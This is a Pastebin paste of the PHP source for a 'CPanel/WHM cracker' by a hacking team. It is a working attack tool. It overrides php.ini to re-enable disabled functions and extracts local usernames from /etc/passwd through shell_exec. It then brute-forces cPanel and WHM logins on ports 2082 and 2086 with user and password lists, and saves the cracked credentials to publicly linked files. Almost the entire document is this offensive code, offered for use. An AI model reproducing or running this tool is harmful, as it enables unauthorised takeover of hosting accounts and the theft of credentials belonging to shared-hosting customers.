Alarg53

WhmCracker

Oct 9th, 2017
147
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.37 KB | None | 0 0
  1. <title>--==[[RR CPanel/WHM cracker by Team InidiShell]]==--</title>
  2. <body bgcolor=black>
  3.     <p h3 style="text-align:center"><div align=center><table   width=100%><tr><td align=center>
  4.     <font size=6 color=white face="comic sans ms"> RR</font><font size=5 color=white face="comic sans ms"> CPanel/WHM</font><font size=5 color=white face="comic sans ms"> cracker By </font><font size=5 color=white face="comic sans ms">Team IndiShell</font><font size=6 color=white face="comic sans ms"></font>
  5.     <br><font
  6.         color="red" face="comic sans ms"size="1">
  7.       <font color=white><b>-==[[Greetz to]]==--</font><br> <font color=red size=-2>  Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>
  8.  
  9. <font color=white>--==[[Dedicated to]]==--</font>
  10. <br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #</table>
  11.                        
  12.            </table><div align=center><font color=white size=4 face='comic sans ms'>>>>&nbsp<a href="<?php echo '?ini'; ?>"><font color=white size=3>rUn php.1n1 first of 4ll</b></font></a><font color=white size=4 face='comic sans ms'>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<a href="<?php echo '?/var/mail'; ?>"><font color=white size=3>Us3rN4m3 ExTracTor</font></a>&nbsp&nbsp&nbsp&nbsp<?php
  13.            
  14.                $r=gethostbyname($_SERVER["HTTP_HOST"]);
  15.                $s="<a href=http://".$r.":2082><font color=white size=4 face='comic sans ms'>link for cpanel login</a>";
  16.                echo $s;
  17.                           ?>&nbsp<<<<br>
  18.            
  19.  
  20.     <?php
  21.    
  22. if(isset($_GET['ini']))
  23. {
  24.     $r=@fopen('php.ini',w);
  25.     $s=" disable_functions =none ";
  26.     $t=@fwrite($r,$s);
  27.      
  28. echo "<p><a href=php.ini><font color=white size=4 face='comic sans ms'>link  to php.ini</a>";
  29.  
  30.     }
  31.  
  32. ?>
  33. <?php
  34. if(isset($_GET['/var/mail']))
  35. {
  36.  
  37. ?> <form method=post><textarea style="background:black;color:white" name=pass rows=20 cols=20 ><?php
  38. $r="cat /etc/passwd | cut -d \":\" -f 1";
  39. echo shell_exec($r); ?></textarea><br><input type=submit name=subm value="click to copy all usernames to username filed" /></form>
  40. <?php
  41. }
  42. ?>
  43. <form method=post><div align=center><font color=red size=3 face='comic sans ms'>/--------------------------------------------\<br></font><div align=center><font color=white size=3 face='comic sans ms'>&nbsp{&nbsp&nbsp&nbsp Usernames&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp Passwords &nbsp&nbsp&nbsp&nbsp&nbsp }</font>
  44. </table><br><div align=center><font color=green size=3 face='comic sans ms'>\-------------------------------------------/</font><br><table><font color=white size=3 face="comic sans ms">Attack =><select name="op">
  45. <option name="op" value="cp">CPanel</option>
  46. <option name="op" value="whm">WHMPanel</option></table><br>
  47. <?php      
  48. if(isset($_POST['subm']))
  49. {
  50.     $pa=$_POST["pass"];
  51. ?>
  52. <textarea style="background:black;color:white" rows=25 cols=25 name=usernames  ><?php echo $pa; ?></textarea>
  53. <?php
  54. }
  55. else{
  56.     ?>
  57.     <textarea style="background:black;color:white" rows=25 cols=25 name=usernames ></textarea>
  58.    
  59. <?php   }
  60.  
  61. ?>
  62.  
  63. &nbsp <textarea style="background:black;color:white" rows=25 cols=25 name=passwords></textarea><br><br>
  64. <input type=submit name=cracking value="lets hex this shit XD" /></form><br>
  65. <?php
  66. error_reporting(0);
  67. $connect_timeout=5;
  68. set_time_limit(0);
  69. $submit=$_POST['submit'];
  70. $userl=$_POST['usernames'];
  71. $passl=$_POST['passwords'];
  72. $attack=$_POST['op'];
  73. $target = "localhost";
  74. if(isset($_POST['cracking']))
  75. {
  76.     if($userl!=="" && $passl!=="")
  77. {  
  78. if($_POST["op"]=="cp")
  79. {
  80.     @fopen('cracked_cpanel.txt','a');
  81.     echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
  82.     echo "<p><a href=cracked_cpanel.txt><font color=white size=2 face='comic sans ms'>here is link for file, which will store Cracked cpanel usernames with passwords </font></a></p><br>";
  83.    
  84.     }
  85.     elseif($_POST["op"]=="whm")
  86. {
  87.     @fopen('cracked_whm.txt','a');
  88.     echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
  89.     echo "<p><a href=cracked_whm.txt><font color=white size=2 face='comic sans ms'>here is link for file, which will store Cracked whm usernames with passwords </font></a></p><br>";
  90.     }
  91.  
  92. function cpanel($host,$user,$pass,$timeout){
  93. $ch = curl_init();
  94. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  95. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  96. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  97. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  98. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  99. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  100. $data = curl_exec($ch);
  101. if ( curl_errno($ch) == 0 ){
  102. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  103. $x=$user." ".$pass ." \n" ;
  104. $y=@fopen('cracked_cpanel.txt','a+');
  105. @fwrite($y,$x);
  106.  
  107. }
  108.  
  109. curl_close($ch);}
  110.  
  111. $userlist=explode("\n",$userl);
  112. $passlist=explode("\n",$passl);
  113.  
  114. foreach ($userlist as $user) {
  115. $finaluser = trim($user);
  116. foreach ($passlist as $password ) {
  117. $finalpass = trim($password);
  118.  
  119. if ($attack == "cp")
  120. {
  121.     echo "<table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user with password $password </font></td></tr></table>";
  122. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  123.  
  124. }
  125. }
  126.  
  127. }
  128.  
  129. function whm($host,$user,$pass,$timeout){
  130. $ch = curl_init();
  131. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  132. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  133. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  134. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  135. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  136. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  137. $data = curl_exec($ch);
  138. if ( curl_errno($ch) == 0 ){
  139. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  140.  
  141. $x=$user." ".$pass ." \n" ;
  142. $y=@fopen('cracked_whm.txt','a+');
  143. @fwrite($y,$x);
  144.  
  145.  
  146. }
  147.  
  148.  
  149. curl_close($ch);}
  150. $userlist=explode("\n",$userl);
  151. $passlist=explode("\n",$passl);
  152.  
  153. foreach ($userlist as $user) {
  154. $finaluser = trim($user);
  155. foreach ($passlist as $password ) {
  156. $finalpass = trim($password);
  157.  
  158. if ($attack == "whm")
  159. {
  160.     echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
  161. whm($target,$finaluser,$finalpass,$connect_timeout);
  162. }
  163. }
  164. }
  165. }
  166. elseif($userl=="")
  167. {
  168.     echo "what are you doing bhai ji :( , you have left userlist field empty";
  169.    
  170.     }
  171.     elseif($passl=="")
  172.     {
  173.        
  174.         echo "bhai ji :( ... please put passwords in paasword list field";
  175.         }
  176. }
  177. ?>
Add Comment
Please, Sign In to add comment